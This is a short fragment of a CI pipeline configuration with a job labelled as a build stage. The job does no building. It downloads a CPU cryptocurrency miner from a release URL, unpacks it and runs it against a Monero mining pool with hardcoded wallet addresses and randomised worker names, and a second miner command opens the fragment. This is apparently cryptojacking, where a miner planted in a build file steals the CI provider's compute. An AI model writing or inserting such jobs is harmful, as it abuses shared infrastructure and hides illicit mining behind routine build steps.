    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.10:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)
